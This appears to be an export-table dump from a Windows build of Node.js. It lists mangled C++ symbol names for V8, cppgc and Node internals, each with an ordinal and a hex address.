                                                                                                                                                                                                        ?DynamicCheckMaps@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$Flags@W4CheckMapsFlag@compiler@internal@v8@@H@base@4@V?$Handle@VObject@internal@v8@@@34@AEBV?$ZoneHandleSet@VMap@internal@v8@@@34@AEBUFeedbackSource@234@@Z52140x140f4dd30
                                                                                                                                                                                                        ?DynamicCheckMapsWithDeoptUnless@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_N@Z52150x140eb2f20
                                                                                                                                                                                                        ?DynamicCheckMapsWithDeoptUnless@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0000VFrameState@234@@Z52160x140f59f50
                                                                                                                                                                                                        ?DynamicGrowingFactor@?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@CANNNN@Z52170x1409c6a40
                                                                                                                                                                                                        ?DynamicGrowingFactor@?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@CANNNN@Z52180x1409c6a40
                                                                                                                                                                                                        ?EffectInputCount@Operator@compiler@internal@v8@@QEBAHXZ52190x14038a2d0
                                                                                                                                                                                                        ?EffectOutputCount@Operator@compiler@internal@v8@@QEBAHXZ52200x140287db0
                                                                                                                                                                                                        ?EffectPhi@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z52210x140eb2f40
                                                                                                                                                                                                        ?ElapsedTime@CompilationJob@internal@v8@@IEBA?AVTimeDelta@base@3@XZ52220x140483470
                                                                                                                                                                                                        ?ElementAccessOf@compiler@internal@v8@@YAAEBUElementAccess@123@PEBVOperator@123@@Z52230x14032ab80
                                                                                                                                                                                                        ?ElementAdded@HashTableBase@internal@v8@@QEAAXXZ52240x1404834b0
                                                                                                                                                                                                        ?ElementRemoved@HashTableBase@internal@v8@@QEAAXXZ52250x1404834d0
                                                                                                                                                                                                        ?ElementSizeInBytes@AsmType@wasm@internal@v8@@QEAAHXZ52260x1406327e0
                                                                                                                                                                                                        ?ElementSizeInBytes@internal@v8@@YAHW4MachineRepresentation@12@@Z52270x140483510
                                                                                                                                                                                                        ?ElementSizeInPointers@internal@v8@@YAHW4MachineRepresentation@12@@Z52280x140483530
                                                                                                                                                                                                        ?ElementSizeLog2Of@internal@v8@@YAHW4MachineRepresentation@12@@Z52290x140483560
                                                                                                                                                                                                        ?ElementsKindToByteSize@internal@v8@@YAHW4ElementsKind@12@@Z52300x1408ba2d0
                                                                                                                                                                                                        ?ElementsKindToShiftSize@internal@v8@@YAHW4ElementsKind@12@@Z52310x1408ba2f0
                                                                                                                                                                                                        ?ElementsRemoved@HashTableBase@internal@v8@@QEAAXH@Z52320x140483600
                                                                                                                                                                                                        ?Eliminate@MoveOperands@compiler@internal@v8@@QEAAXXZ52330x1404bb920
                                                                                                                                                                                                        ?EliminateLoopExit@LoopPeeler@compiler@internal@v8@@SAXPEAVNode@234@@Z52340x14103c5c0
                                                                                                                                                                                                        ?EliminateLoopExits@LoopPeeler@compiler@internal@v8@@SAXPEAVGraph@234@PEAVZone@34@@Z52350x14103c7c0
                                                                                                                                                                                                        ?EliminateRedundantPhiNodes@Schedule@compiler@internal@v8@@AEAAXXZ52360x140ee2290
                                                                                                                                                                                                        ?Else@ConditionalControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ52370x1408f3c40
                                                                                                                                                                                                        ?EmbedderAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANN@Z52380x1409c88e0
                                                                                                                                                                                                        ?EmbedderSizeOfObjects@Heap@internal@v8@@QEBA_KXZ52390x1409b4cd0
                                                                                                                                                                                                        ?EmbedderSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ52400x1409c8980
                                                                                                                                                                                                        ?EmbedderStep@IncrementalMarking@internal@v8@@QEAA?AW4StepResult@23@NPEAN@Z52410x1409a7060
                                                                                                                                                                                                        ?Emit16@RegExpBytecodeGenerator@internal@v8@@AEAAXI@Z52420x14073d300
                                                                                                                                                                                                        ?Emit32@RegExpBytecodeGenerator@internal@v8@@AEAAXI@Z52430x14073d3a0
                                                                                                                                                                                                        ?Emit8@RegExpBytecodeGenerator@internal@v8@@AEAAXI@Z52440x14073d440
                                                                                                                                                                                                        ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@000000_KPEAV6234@@Z52450x140ed4a60
                                                                                                                                                                                                        ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@00000_KPEAV6234@@Z52460x140ed4bb0
                                                                                                                                                                                                        ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@0000_KPEAV6234@@Z52470x140ed4cf0
                                                                                                                                                                                                        ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@000_KPEAV6234@@Z52480x140ed4e20
                                                                                                                                                                                                        ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@00_KPEAV6234@@Z52490x140ed4f40
                                                                                                                                                                                                        ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@0_KPEAV6234@@Z52500x140ed5050
                                                                                                                                                                                                        ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@_KPEAV6234@@Z52510x140ed5150
                                                                                                                                                                                                        ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@I_KPEAVInstructionOperand@234@0101@Z52520x140ed5240
                                                                                                                                                                                                        ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@PEAV5234@@Z52530x140ed52e0
                                                                                                                                                                                                        ?Emit@LocalDeclEncoder@wasm@internal@v8@@QEBA_KPEAE@Z52540x1405a0fc0
                                                                                                                                                                                                        ?Emit@RegExpBytecodeGenerator@internal@v8@@AEAAXIH@Z52550x14073d4e0
                                                                                                                                                                                                        ?Emit@RegExpBytecodeGenerator@internal@v8@@AEAAXII@Z52560x14073d4e0
                                                                                                                                                                                                        ?Emit@SafepointTableBuilder@internal@v8@@QEAAXPEAVAssembler@23@H@Z52570x140a7f670
                                                                                                                                                                                                        ?Emit@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@@Z52580x14053feb0
                                                                                                                                                                                                        ?EmitAsyncDestroy@node@@YAXPEAVEnvironment@1@Uasync_context@1@@Z52590x140289bc0
                                                                                                                                                                                                        ?EmitAsyncDestroy@node@@YAXPEAVIsolate@v8@@Uasync_context@1@@Z52600x140289bd0
                                                                                                                                                                                                        ?EmitAsyncInit@node@@YA?AUasync_context@1@PEAVIsolate@v8@@V?$Local@VObject@v8@@@4@PEBDN@Z52610x140289c00
                                                                                                                                                                                                        ?EmitAsyncInit@node@@YA?AUasync_context@1@PEAVIsolate@v8@@V?$Local@VObject@v8@@@4@V?$Local@VString@v8@@@4@N@Z52620x140289d50
                                                                                                                                                                                                        ?EmitBeforeExit@node@@YAXPEAVEnvironment@1@@Z52630x140289e00
                                                                                                                                                                                                        ?EmitBinarySearchSwitch@InstructionSelector@compiler@internal@v8@@AEAAXAEBVSwitchInfo@234@AEBVInstructionOperand@234@@Z52640x140ed5310
                                                                                                                                                                                                        ?EmitByte@WasmFunctionBuilder@wasm@internal@v8@@QEAAXE@Z52650x14053fef0
                                                                                                                                                                                                        ?EmitBytecode@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXQEBVBytecodeNode@234@@Z52660x140912450
                                                                                                                                                                                                        ?EmitCode@WasmFunctionBuilder@wasm@internal@v8@@QEAAXPEBEI@Z52670x14053ff30
                                                                                                                                                                                                        ?EmitDecrementCounter@MacroAssembler@internal@v8@@QEAAXPEAVStatsCounter@23@H@Z52680x140503ef0
                                                                                                                                                                                                        ?EmitDirectCallIndex@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z52690x14053ff80
                                                                                                                                                                                                        ?EmitExit@node@@YAHPEAVEnvironment@1@@Z52700x140289e20
                                                                                                                                                                                                        ?EmitF32Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAXM@Z52710x14053ffe0
                                                                                                                                                                                                        ?EmitF64Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAXN@Z52720x140540040
                                                                                                                                                                                                        ?EmitFarJumpSlot@JumpTableAssembler@wasm@internal@v8@@AEAAX_K@Z52730x1405a1530
                                                                                                                                                                                                        ?EmitFunctionStartSourcePosition@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAXH@Z52740x14091dd30
                                                                                                                                                                                                        ?EmitGetLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z52750x1405400a0
                                                                                                                                                                                                        ?EmitI32Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAXH@Z52760x1405400b0
                                                                                                                                                                                                        ?EmitI32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXH@Z52770x1405400f0
                                                                                                                                                                                                        ?EmitI64Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAX_J@Z52780x140540100
                                                                                                                                                                                                        ?EmitIdentity@InstructionSelector@compiler@internal@v8@@QEAAXPEAVNode@234@@Z52790x140ed5540
                                                                                                                                                                                                        ?EmitIncrementCounter@MacroAssembler@internal@v8@@QEAAXPEAVStatsCounter@23@H@Z52800x140503fe0
                                                                                                                                                                                                        ?EmitJump@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXPEAVBytecodeLabels@234@@Z52810x1408f3c80
                                                                                                                                                                                                        ?EmitJump@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@PEAVBytecodeLabel@234@@Z52820x1409125b0
                                                                                                                                                                                                        ?EmitJumpIfFalse@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@PEAVBytecodeLabels@234@@Z52830x1408f3cb0
                                                                                                                                                                                                        ?EmitJumpIfNull@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXPEAVBytecodeLabels@234@@Z52840x1408f3ce0
                                                                                                                                                                                                        ?EmitJumpIfTrue@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@PEAVBytecodeLabels@234@@Z52850x1408f3d10
                                                                                                                                                                                                        ?EmitJumpIfUndefined@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXPEAVBytecodeLabels@234@@Z52860x1408f3d40
                                                                                                                                                                                                        ?EmitJumpLoop@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@PEAVBytecodeLoopHeader@234@@Z52870x140912630
                                                                                                                                                                                                        ?EmitJumpSlot@JumpTableAssembler@wasm@internal@v8@@AEAA_N_K@Z52880x1405a15d0
                                                                                                                                                                                                        ?EmitJumpTableIfExists@SwitchBuilder@interpreter@internal@v8@@QEAAXHHAEAV?$map@HPEAVCaseClause@internal@v8@@U?$less@H@std@@V?$allocator@U?$pair@$$CBHPEAVCaseClause@internal@v8@@@std@@@5@@std@@@Z52890x1408f3d70
                                                                                                                                                                                                        ?EmitLazyCompileJumpSlot@JumpTableAssembler@wasm@internal@v8@@AEAAXI_K@Z52900x1405a1610
                                                                                                                                                                                                        ?EmitOrLink@RegExpBytecodeGenerator@internal@v8@@AEAAXPEAVLabel@23@@Z52910x14073d4f0
                                                                                                                                                                                                        ?EmitPrepareArguments@InstructionSelector@compiler@internal@v8@@AEAAXPEAV?$ZoneVector@UPushParameter@compiler@internal@v8@@@34@PEBVCallDescriptor@234@PEAVNode@234@@Z52920x1404c1f60
                                                                                                                                                                                                        ?EmitPrepareResults@InstructionSelector@compiler@internal@v8@@AEAAXPEAV?$ZoneVector@UPushParameter@compiler@internal@v8@@@34@PEBVCallDescriptor@234@PEAVNode@234@@Z52930x1404c23e0
                                                                                                                                                                                                        ?EmitProcessBeforeExit@node@@YA?AV?$Maybe@_N@v8@@PEAVEnvironment@1@@Z52940x140289e50
                                                                                                                                                                                                        ?EmitProcessExit@node@@YA?AV?$Maybe@H@v8@@PEAVEnvironment@1@@Z52950x14028a390
                                                                                                                                                                                                        ?EmitReturnEntry@HandlerTable@internal@v8@@SAXPEAVAssembler@23@HH@Z52960x140a9f500
                                                                                                                                                                                                        ?EmitReturnTableStart@HandlerTable@internal@v8@@SAHPEAVAssembler@23@@Z52970x140a9f540
                                                                                                                                                                                                        ?EmitSetLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z52980x140540140
                                                                                                                                                                                                        ?EmitSwitch@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@PEAVBytecodeJumpTable@234@@Z52990x1409126d0
                                                                                                                                                                                                        ?EmitTableSwitch@InstructionSelector@compiler@internal@v8@@AEAAXAEBVSwitchInfo@234@AEBVInstructionOperand@234@@Z53000x140ed55c0
                                                                                                                                                                                                        ?EmitTeeLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z53010x140540150
                                                                                                                                                                                                        ?EmitU32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z53020x140540160
                                                                                                                                                                                                        ?EmitValueType@WasmFunctionBuilder@wasm@internal@v8@@QEAAXVValueType@234@@Z53030x1405401d0
                                                                                                                                                                                                        ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@00PEAVFlagsContinuation@234@@Z53040x140ed5720
                                                                                                                                                                                                        ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@0PEAVFlagsContinuation@234@@Z53050x140ed5790
                                                                                                                                                                                                        ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@PEAVFlagsContinuation@234@@Z53060x140ed57e0
                                                                                                                                                                                                        ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@I_KPEAVInstructionOperand@234@0101PEAVFlagsContinuation@234@@Z53070x140ed5820
                                                                                                                                                                                                        ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@I_KPEAVInstructionOperand@234@01PEAVFlagsContinuation@234@@Z53080x140ed5c60
                                                                                                                                                                                                        ?EmitWithI32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@H@Z53090x1405401f0
                                                                                                                                                                                                        ?EmitWithPrefix@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@@Z53100x140540240
                                                                                                                                                                                                        ?EmitWithU32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@I@Z53110x140540300
                                                                                                                                                                                                        ?EmitWithU8@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@E@Z53120x1405403a0
                                                                                                                                                                                                        ?EmitWithU8U8@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@EE@Z53130x140540400
                                                                                                                                                                                                        ?EmitWordPoisonOnSpeculation@InstructionSelector@compiler@internal@v8@@AEAAXPEAVNode@234@@Z53140x140ed5cb0
                                                                                                                                                                                                        ?Empty@DeoptimizationData@internal@v8@@SA?AV?$Handle@VDeoptimizationData@internal@v8@@@23@PEAVIsolate@23@@Z53150x1408c23d0
                                                                                                                                                                                                        ?Empty@ScopeInfo@internal@v8@@SA?AV123@PEAVIsolate@23@@Z53160x1407dc310
                                                                                                                                                                                                        ?Empty@String@v8@@SA?AV?$Local@VString@v8@@@2@PEAVIsolate@2@@Z53170x140079110
                                                                                                                                                                                                        ?EmptyArrayBoilerplateDescriptionConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ53180x14091dda0
                                                                                                                                                                                                        ?EmptyBackingStore@BackingStore@internal@v8@@SA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@W4SharedFlag@23@@Z53190x1408c9810
                                                                                                                                                                                                        ?EmptyDeleter@BackingStore@v8@@SAXPEAX_K0@Z53200x140078990
                                                                                                                                                                                                        ?EmptyFixedArrayConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ53210x140f55c90
                                                                                                                                                                                                        ?EmptyFixedArrayConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ53220x14091ddb0
                                                                                                                                                                                                        ?EmptyIdentifierString@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ53230x140774da0
                                                                                                                                                                                                        ?EmptyObjectBoilerplateDescriptionConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ53240x14091ddc0
                                                                                                                                                                                                        ?EmptyStateValues@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ53250x140f55d10
                                                                                                                                                                                                        ?EmptyStringConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ53260x140f55d60
                                                                                                                                                                                                        ?EmptyStringConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VString@internal@v8@@@34@XZ53270x140f5a040
                                                                                                                                                                                                        ?EmptyStringRootIsInitialized@Factory@internal@v8@@AEAA_NXZ53280x1409d12f0
                                                                                                                                                                                                        ?EmptyStringRootIsInitialized@LocalFactory@internal@v8@@AEAA_NXZ53290x140078bb0
                                                                                                                                                                                                        ?Enable@CodeEventHandler@v8@@QEAAXXZ53300x140b10ba0
                                                                                                                                                                                                        ?EnableCodeLogging@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z53310x140556490
                                                                                                                                                                                                        ?EnableCompilationForSourcelessUse@V8@v8@@SAXXZ53320x140b10bb0
                                                                                                                                                                                                        ?EnableCpuFeature@AssemblerBase@internal@v8@@QEAAXW4CpuFeature@23@@Z53330x14049b940
                                                                                                                                                                                                        ?EnableDetachedGarbageCollectionsForTesting@CppHeap@internal@v8@@QEAAXXZ53340x1409e9c80
                                                                                                                                                                                                        ?EnableDetachedGarbageCollectionsForTesting@CppHeap@v8@@QEAAXXZ53350x1409e9ce0
                                                                                                                                                                                                        ?EnableForNextGCForTesting@Compactor@internal@cppgc@@QEAAXXZ53360x140469fe0
                                                                                                                                                                                                        ?EnableInProcessStackDumping@debug@base@v8@@YA_NXZ53370x140e6af00
                                                                                                                                                                                                        ?EnableInlineAllocation@Heap@internal@v8@@QEAAXXZ53380x1409b4cf0
                                                                                                                                                                                                        ?EnableInterrupts@StackGuard@internal@v8@@AEAAXXZ53390x140a008f0
                                                                                                                                                                                                        ?EnableIteration@IdentityMapBase@internal@v8@@IEAAXXZ53400x1406b45e0
                                                                                                                                                                                                        ?EnableLogging@CpuProfiler@internal@v8@@AEAAXXZ53410x140761750
                                                                                                                                                                                                        ?EnableMemorySavingsMode@Isolate@internal@v8@@QEAAXXZ53420x140483640
                                                                                                                                                                                                        ?EnableMemorySavingsMode@Isolate@v8@@QEAAXXZ53430x140483640
                                                                                                                                                                                                        ?EnableScriptAndEval@CompilationCache@internal@v8@@QEAAXXZ53440x140ab08f0
                                                                                                                                                                                                        ?EnableTrapHandler@trap_handler@internal@v8@@YA_N_N@Z53450x140621750
                                                                                                                                                                                                        ?EnableWebAssemblyTrapHandler@V8@v8@@SA_N_N@Z53460x140b10be0
                                                                                                                                                                                                        ?Enabled@GCIdleTimeHandler@internal@v8@@QEAA_NXZ53470x1409cc6a0
                                                                                                                                                                                                        ?Enabled@OptimizingCompileDispatcher@internal@v8@@SA_NXZ53480x1406e2a90
                                                                                                                                                                                                        ?Enabled@StatsCounterThreadSafe@internal@v8@@QEAA_NXZ53490x140483650
                                                                                                                                                                                                        ?Encode@Utf8@unibrow@@SAIPEADIH_N@Z53500x1406bb040
                                                                                                                                                                                                        ?Encode@node@@YA?AV?$Local@VValue@v8@@@v8@@PEAVIsolate@3@PEBD_KW4encoding@1@@Z53510x14028e3e0
                                                                                                                                                                                                        ?Encode@node@@YA?AV?$Local@VValue@v8@@@v8@@PEAVIsolate@3@PEBG_K@Z53520x14028e450
                                                                                                                                                                                                        ?EncodeI32ExceptionValue@internal@v8@@YAXV?$Handle@VFixedArray@internal@v8@@@12@PEAII@Z53530x14052f420
                                                                                                                                                                                                        ?EncodeI64ExceptionValue@internal@v8@@YAXV?$Handle@VFixedArray@internal@v8@@@12@PEAI_K@Z53540x14052f480
                                                                                                                                                                                                        ?EncodeOneByte@Utf8@unibrow@@SAIPEADE@Z53550x1406bb150
                                                                                                                                                                                                        ?End@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_K@Z53560x140eb3060
                                                                                                                                                                                                        ?End@LiveRange@compiler@internal@v8@@QEBA?AVLifetimePosition@234@XZ53570x140f105a0
                                                                                                                                                                                                        ?EndArray@TracedValue@tracing@v8@@QEAAXXZ53580x1400f8b90
                                                                                                                                                                                                        ?EndBlock@InstructionScheduler@compiler@internal@v8@@QEAAXVRpoNumber@234@@Z53590x140f53b10
                                                                                                                                                                                                        ?EndBlock@InstructionSelector@compiler@internal@v8@@QEAAXVRpoNumber@234@@Z53600x140ed5e40
                                                                                                                                                                                                        ?EndBlock@InstructionSequence@compiler@internal@v8@@QEAAXVRpoNumber@234@@Z53610x140ea8fc0
                                                                                                                                                                                                        ?EndCatch@TryCatchBuilder@interpreter@internal@v8@@QEAAXXZ53620x1408f3e30
                                                                                                                                                                                                        ?EndDictionary@TracedValue@tracing@v8@@QEAAXXZ53630x1400f8bf0
                                                                                                                                                                                                        ?EndFinally@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ53640x140078990
                                                                                                                                                                                                        ?EndOffset@BlockData@Coverage@debug@v8@@QEBAHXZ53650x140342dd0
                                                                                                                                                                                                        ?EndOffset@FunctionData@Coverage@debug@v8@@QEBAHXZ53660x140342dd0
                                                                                                                                                                                                        ?EndPosition@SharedFunctionInfo@internal@v8@@QEBAHXZ53670x1407d7660
                                                                                                                                                                                                        ?EndTry@TryCatchBuilder@interpreter@internal@v8@@QEAAXXZ53680x1408f3e40
                                                                                                                                                                                                        ?EndTry@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ53690x1408f3eb0
                                                                                                                                                                                                        ?EnforceFlagImplications@FlagList@internal@v8@@SAXXZ53700x1409f8e70
                                                                                                                                                                                                        ?Enqueue@ControlFlowOptimizer@compiler@internal@v8@@AEAAXPEAVNode@234@@Z53710x140fa0a60
                                                                                                                                                                                                        ?Enqueue@LazyCompileDispatcher@internal@v8@@QEAA?AV?$Optional@_K@base@3@PEBVParseInfo@23@PEBVAstRawString@23@PEBVFunctionLiteral@23@@Z53720x140a7c3c0
                                                                                                                                                                                                        ?Enqueue@ProfilerEventsProcessor@internal@v8@@QEAAXAEBVCodeEventsContainer@23@@Z53730x140761960
                                                                                                                                                                                                        ?EnqueueMicrotask@Isolate@v8@@QEAAXP6AXPEAX@Z0@Z53740x140b10bf0
                                                                                                                                                                                                        ?EnqueueMicrotask@Isolate@v8@@QEAAXV?$Local@VFunction@v8@@@2@@Z53750x140b10c10
                                                                                                                                                                                                        ?EnqueueMicrotask@MicrotaskQueue@internal@v8@@QEAAXVMicrotask@23@@Z53760x140a02e20
                                                                                                                                                                                                        ?EnqueueMicrotask@MicrotaskQueue@internal@v8@@UEAAXPEAVIsolate@3@P6AXPEAX@Z1@Z53770x140a02e80
                                                                                                                                                                                                        ?EnqueueMicrotask@MicrotaskQueue@internal@v8@@UEAAXPEAVIsolate@3@V?$Local@VFunction@v8@@@3@@Z53780x140a02f70
                                                                                                                                                                                                        ?EnqueueNode@ProfileTree@internal@v8@@QEAAXPEBVProfileNode@23@@Z53790x140744af0
                                                                                                                                                                                                        ?EnsureAllRegistersAreFlushed@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEBA_NXZ53800x1408f7fa0
                                                                                                                                                                                                        ?EnsureAllocation@NewSpace@internal@v8@@AEAA_NHW4AllocationAlignment@23@@Z53810x14096f480
                                                                                                                                                                                                        ?EnsureBlackAllocated@IncrementalMarking@internal@v8@@QEAAX_K0@Z53820x1409a7420
                                                                                                                                                                                                        ?EnsureBlock@RawMachineAssembler@compiler@internal@v8@@AEAAPEAVBasicBlock@234@PEAVRawMachineLabel@234@@Z53830x14108cd90
                                                                                                                                                                                                        ?EnsureBreakInfo@Debug@internal@v8@@QEAA_NV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z53840x140a5eee0
                                                                                                                                                                                                        ?EnsureCFGWellFormedness@Schedule@compiler@internal@v8@@AEAAXXZ53850x140ee2400
                                                                                                                                                                                                        ?EnsureCapacity@Bignum@base@v8@@AEAAXH@Z53860x140e6a690
                                                                                                                                                                                                        ?EnsureCapacity@StringTable@internal@v8@@AEAAPEAVData@123@VPtrComprCageBase@23@H@Z53870x1407ca6f0
                                                                                                                                                                                                        ?EnsureChunk@TypedSlots@internal@v8@@IEAAPEAUChunk@123@XZ53880x1409570e0
                                                                                                                                                                                                        ?EnsureConsoleOutputWin32@base@v8@@YAXXZ53890x140e5fec0
                                                                                                                                                                                                        ?EnsureDecodedOffsets@AsmJsOffsetInformation@wasm@internal@v8@@AEAAXXZ53900x140538e90
                                                                                                                                                                                                        ?EnsureDescriptorSlack@Map@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@H@Z53910x140810f50
                                                                                                                                                                                                        ?EnsureFeedbackVector@JSFunction@internal@v8@@SAXV?$Handle@VJSFunction@internal@v8@@@23@PEAVIsCompiledScope@23@@Z53920x140853b00
                                                                                                                                                                                                        ?EnsureGCInfoIndex@internal@cppgc@@YAGAEAU?$atomic@G@std@@P6AXPEAX@ZP6AXPEAVVisitor@2@PEBX@ZP6A?AUHeapObjectName@12@4@Z_N@Z53930x1404662f0
                                                                                                                                                                                                        ?EnsureHasFullTransitionArray@TransitionsAccessor@internal@v8@@AEAAXXZ53940x1407bc250
                                                                                                                                                                                                        ?EnsureHasInitialMap@JSFunction@internal@v8@@SAXV?$Handle@VJSFunction@internal@v8@@@23@@Z53950x140853d00
                                                                                                                                                                                                        ?EnsureIndirectFunctionTableWithMinimumSize@WasmInstanceObject@internal@v8@@SA_NV?$Handle@VWasmInstanceObject@internal@v8@@@23@HI@Z53960x14052f530
                                                                                                                                                                                                        ?EnsureInputCount@Node@compiler@internal@v8@@QEAAXPEAVZone@34@H@Z53970x140ea2b20
                                                                                                                                                                                                        ?EnsureInterval@TopLevelLiveRange@compiler@internal@v8@@QEAAXVLifetimePosition@234@0PEAVZone@34@_N@Z53980x140f85540
                                                                                                                                                                                                        ?EnsureLabMain@PagedSpace@internal@v8@@IEAA_NHW4AllocationOrigin@23@@Z53990x140483660
                                                                                                                                                                                                        ?EnsureNodeSlots@PersistentRegion@internal@cppgc@@AEAAXXZ54000x1404578e0
                                                                                                                                                                                                        ?EnsureParkedBeforeDestruction@LocalHeap@internal@v8@@AEAAXXZ54010x140078990
                                                                                                                                                                                                        ?EnsurePersistentHandles@LocalHeap@internal@v8@@AEAAXXZ54020x1409a3620
                                                                                                                                                                                                        ?EnsureRareData@ClassScope@internal@v8@@AEAAPEAURareData@123@XZ54030x1406eb320
                                                                                                                                                                                                        ?EnsureRareData@DeclarationScope@internal@v8@@AEAAPEAURareData@123@XZ54040x1406eb3c0
                                                                                                                                                                                                        ?EnsureReturnSlots@Frame@compiler@internal@v8@@QEAAXH@Z54050x1404bb930
                                                                                                                                                                                                        ?EnsureSourcePositionsAvailable@FrameSummary@internal@v8@@QEAAXXZ54060x140a20df0
                                                                                                                                                                                                        ?EnsureSplitEdgeForm@Schedule@compiler@internal@v8@@AEAAXPEAVBasicBlock@234@@Z54070x140078990
                                                                                                                                                                                                        ?EnsureSweepingCompleted@MarkCompactCollector@internal@v8@@QEAAXXZ54080x14098e6c0
                                                                                                                                                                                                        ?EnsureUnmappingCompleted@Unmapper@MemoryAllocator@internal@v8@@QEAAXXZ54090x140974de0
                                                                                                                                                                                                        ?EnsureValid@iterator@StateValuesAccess@compiler@internal@v8@@AEAAXXZ54100x140f572f0
                                                                                                                                                                                                        ?EnsureWritableFastElements@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ54110x140f4de20
                                                                                                                                                                                                        ?Enter@Context@v8@@QEAAXXZ54120x140b10f70
                                                                                                                                                                                                        ?Enter@DisallowGarbageCollectionScope@subtle@cppgc@@SAXAEAVHeapHandle@3@@Z54130x140465030
                                                                                                                                                                                                        ?Enter@Isolate@internal@v8@@QEAAXXZ54140x140a10bf0
                                                                                                                                                                                                        ?Enter@Isolate@v8@@QEAAXXZ54150x140b110c0
                                                                                                                                                                                                        ?Enter@NoGarbageCollectionScope@subtle@cppgc@@SAXAEAVHeapHandle@3@@Z54160x140465050
                                                                                                                                                                                                        ?EnterApiExitFrame@MacroAssembler@internal@v8@@QEAAXH@Z54170x1405040d0
                                                                                                                                                                                                        ?EnterAtomicPause@MarkerBase@internal@cppgc@@QEAAXW4EmbedderStackState@3@@Z54180x14045e190
                                                                                                                                                                                                        ?EnterExitFrame@MacroAssembler@internal@v8@@QEAAXH_NW4Type@StackFrame@23@@Z54190x140504110
                                                                                                                                                                                                        ?EnterExitFrameEpilogue@MacroAssembler@internal@v8@@AEAAXH_N@Z54200x1405041b0
                                                                                                                                                                                                        ?EnterExitFramePrologue@MacroAssembler@internal@v8@@AEAAXVRegister@23@W4Type@StackFrame@23@@Z54210x1405043a0
                                                                                                                                                                                                        ?EnterFinalPause@CppHeap@internal@v8@@UEAAXW4EmbedderStackState@cppgc@@@Z54220x1409e9d70
